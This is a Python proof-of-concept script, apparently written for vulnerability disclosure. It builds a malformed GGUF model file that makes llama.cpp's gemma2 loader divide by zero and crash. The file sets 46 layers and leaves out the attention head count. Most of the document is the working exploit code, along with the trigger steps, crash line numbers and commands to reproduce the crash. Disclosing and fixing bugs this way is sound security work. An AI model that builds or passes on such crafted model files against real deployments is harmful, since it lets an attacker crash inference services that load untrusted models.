"""
PoC: Integer division-by-zero (SIGFPE / UB) in llama.cpp gemma2 architecture loading.

Vulnerability: In src/llama-model.cpp, the LLM_ARCH_GEMMA2 handler computes:

    hparams.f_attention_scale = type == LLM_TYPE_27B
        ? 1.0f / std::sqrt(float(hparams.n_embd / hparams.n_head(0)))
        : 1.0f / std::sqrt(float(hparams.n_embd_head_k));

When n_layer == 46, the type is set to LLM_TYPE_27B, so the first branch is taken.
If the `attention.head_count` key is omitted from the GGUF file, n_head_arr
stays filled with 0s (from the std::fill at line 552), so n_head(0) returns 0.
This makes `hparams.n_embd / hparams.n_head(0)` an integer division by zero.

The guard at line 606 (`if (hparams.n_head() > 0)`) only protects the
n_embd_head_k calculation, not the architecture-specific code at line 1347.

Platform behavior:
  - x86_64: SIGFPE (hardware trap on integer division by zero), exit code 136
  - ARM64:  silent undefined behavior (ARM SDIV returns 0 for div-by-zero),
            but UBSan catches it and aborts with exit code 134

Attack vector:
  1. Set general.architecture = "gemma2"
  2. Set gemma2.block_count = 46 (triggers LLM_TYPE_27B)
  3. Set gemma2.embedding_length = 4096 (any non-zero value)
  4. Set gemma2.context_length = 8192 (required)
  5. Set gemma2.attention.layer_norm_rms_epsilon = 1e-6 (required for gemma2)
  6. OMIT gemma2.attention.head_count (this key is loaded with required=false)
  7. n_head_arr stays all-zero => n_head(0) == 0 => division by zero

The crash occurs during load_hparams(), before vocab or tensor loading,
so no valid vocabulary or tensor data is needed.

Confirmed UBSan output:
  src/llama-model.cpp:1347:61: runtime error: division by zero
  SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/llama-model.cpp:1347:61
"""
|
|
import os
import struct
import sys
|
|
# --- GGUF container constants (GGUF v3 file format) ---

GGUF_MAGIC = b"GGUF"          # magic bytes at offset 0 of every GGUF file
GGUF_VERSION = 3              # container format version written to the header
GGUF_DEFAULT_ALIGNMENT = 32   # default alignment of the tensor-data section

# GGUF metadata value-type tags (only the subset this PoC needs).
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_STRING = 8
def write_string(f, s):
    """Write a GGUF string to *f*: uint64 little-endian length + UTF-8 bytes.

    GGUF strings carry no null terminator; the length prefix counts the
    encoded bytes, not the characters.
    """
    encoded = s.encode('utf-8')
    f.write(struct.pack('<Q', len(encoded)))
    f.write(encoded)
def write_kv_string(f, key, value):
    """Write one GGUF metadata KV pair whose value is a string.

    Layout: key (GGUF string) + uint32 type tag + value (GGUF string).
    """
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    write_string(f, value)
def write_kv_uint32(f, key, value):
    """Write one GGUF metadata KV pair whose value is a uint32.

    Layout: key (GGUF string) + uint32 type tag + little-endian uint32 value.
    Raises struct.error if *value* does not fit in an unsigned 32-bit int.
    """
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_UINT32))
    f.write(struct.pack('<I', value))
def write_kv_float32(f, key, value):
    """Write one GGUF metadata KV pair whose value is a float32.

    Layout: key (GGUF string) + uint32 type tag + little-endian IEEE-754
    single-precision value (the Python float is narrowed to 32 bits).
    """
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
    f.write(struct.pack('<f', value))
def create_gemma2_divzero_gguf(output_path):
    """Create a GGUF file that triggers integer division-by-zero in gemma2 hparams loading.

    The crash occurs in load_hparams() at the LLM_ARCH_GEMMA2 case, before
    vocab or tensor loading, so the file needs only:
      - a valid GGUF v3 header,
      - the required KV pairs for gemma2 (but NOT attention.head_count),
      - zero tensors (the crash happens before tensors are loaded).
    """
    # (writer, key, value) triples. The header's KV count is derived from
    # this list so it can never drift out of sync with what is written
    # (previously n_kv was a hand-maintained literal).
    kv_pairs = [
        # Route model loading into the LLM_ARCH_GEMMA2 switch case.
        (write_kv_string, "general.architecture", "gemma2"),
        # Required hparam; any plausible value works.
        (write_kv_uint32, "gemma2.context_length", 8192),
        # Non-zero numerator for the doomed n_embd / n_head(0) division.
        (write_kv_uint32, "gemma2.embedding_length", 4096),
        # 46 layers => LLM_TYPE_27B => the vulnerable branch is taken.
        (write_kv_uint32, "gemma2.block_count", 46),
        # Required for gemma2 hparam loading to proceed.
        (write_kv_float32, "gemma2.attention.layer_norm_rms_epsilon", 1e-6),
        # gemma2.attention.head_count is deliberately OMITTED (it is loaded
        # with required=false): n_head_arr stays all-zero => n_head(0) == 0.
    ]
    n_tensors = 0  # crash happens before tensor loading; none are needed

    with open(output_path, 'wb') as f:
        # GGUF v3 header: magic, version, tensor count, KV count.
        f.write(GGUF_MAGIC)
        f.write(struct.pack('<I', GGUF_VERSION))
        f.write(struct.pack('<Q', n_tensors))
        f.write(struct.pack('<Q', len(kv_pairs)))

        for writer, key, value in kv_pairs:
            writer(f, key, value)

        # Pad to the default GGUF alignment (start of the empty data section).
        current_pos = f.tell()
        aligned_pos = (current_pos + GGUF_DEFAULT_ALIGNMENT - 1) // GGUF_DEFAULT_ALIGNMENT * GGUF_DEFAULT_ALIGNMENT
        if aligned_pos > current_pos:
            f.write(b'\x00' * (aligned_pos - current_pos))

    file_size = os.path.getsize(output_path)
    print(f"[*] Created: {output_path}")
    print(f"[*] File size: {file_size} bytes")
    print("[*]")
    print("[*] Vulnerability details:")
    print("[*]   Architecture: gemma2 (LLM_ARCH_GEMMA2)")
    print("[*]   block_count: 46 (triggers LLM_TYPE_27B)")
    print("[*]   embedding_length: 4096")
    print("[*]   head_count: OMITTED (stays 0 from std::fill)")
    print("[*]")
    print("[*] Crash location: src/llama-model.cpp:1347")
    print("[*]   hparams.n_embd / hparams.n_head(0)")
    print("[*]   = 4096 / 0")
    print("[*]   => integer division by zero (UB)")
    print("[*]")
    print("[*] Test with (x86_64 -- deterministic SIGFPE crash):")
    print(f"[*]   ./build/bin/llama-cli -m {output_path} -p 'hello'")
    print("[*]   Expected: SIGFPE, exit code 136")
    print("[*]")
    print("[*] Test with UBSan (any platform -- clean UB report):")
    print("[*]   cmake -B build-ubsan \\")
    print("[*]     -DCMAKE_C_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\")
    print("[*]     -DCMAKE_CXX_FLAGS='-fsanitize=undefined -fno-sanitize-recover=all' \\")
    print("[*]     -DCMAKE_EXE_LINKER_FLAGS='-fsanitize=undefined' \\")
    print("[*]     -DCMAKE_SHARED_LINKER_FLAGS='-fsanitize=undefined' \\")
    print("[*]     -DGGML_METAL=OFF -DGGML_BLAS=OFF -DGGML_CUDA=OFF")
    print("[*]   cmake --build build-ubsan -j$(nproc)")
    print(f"[*]   ./build-ubsan/bin/llama-completion -m {output_path} -p 'hello'")
    print("[*]   Expected: 'runtime error: division by zero', exit code 134")
if __name__ == "__main__":
    # Output directory: first CLI argument if given, otherwise a local
    # "gguf_poc" directory. (The previous hard-coded absolute
    # /Users/eltarne/... path only exists on the author's machine and
    # makedirs would fail with a permission error anywhere else.)
    output_dir = sys.argv[1] if len(sys.argv) > 1 else "gguf_poc"
    os.makedirs(output_dir, exist_ok=True)

    output_path = os.path.join(output_dir, "poc_gemma2_divzero.gguf")
    create_gemma2_divzero_gguf(output_path)